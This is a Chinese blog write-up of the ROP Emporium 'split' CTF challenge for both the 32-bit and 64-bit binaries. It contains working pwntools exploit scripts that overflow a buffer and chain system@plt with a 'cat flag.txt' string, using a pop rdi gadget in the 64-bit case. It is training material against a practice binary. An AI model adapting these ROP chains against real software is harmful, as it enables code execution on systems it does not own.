【rop emporium 2020】split

这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录
因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。
题目链接:https://ropemporium.com/challenge/split.html
备注:以下题目都是在ubuntu16.04下完成

32位

这题和上一题差不多,就是多了一个步骤。用gdb调试一下,发现还是偏移还是44…

用ida分析二进制,shift+F12打开字符串窗口,可以看到/bin/cat flag.txt字符串。
在这里插入图片描述

然后可以再去找到system函数的plt的地址来构造rop链。
在这里插入图片描述

最后的exp如下:

from pwn import *
p = process("split32")
payload = "a" * 44 + p32(0x080483e0)+p32(0)+p32(0x0804a030)
p.sendline(payload)
p.interactive()

运行结果:
在这里插入图片描述

64位

思路和上面一样,区别在于64位的传参规则是:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
所以需要找下pop rdi;ret的gadget。

在这里插入图片描述
要传入的字符串参数的地址通过ida找到,为0x601060
在这里插入图片描述
然后system函数的plt地址为0x400560
在这里插入图片描述
最后exp如下:

from pwn import * 
p = process("./split")
payload = "A" * 40 + p64(0x4007c3) + p64(0x601060) + p64(0x400560)
p.sendline(payload)
p.interactive()

运行得到结果:
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

破落之实

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值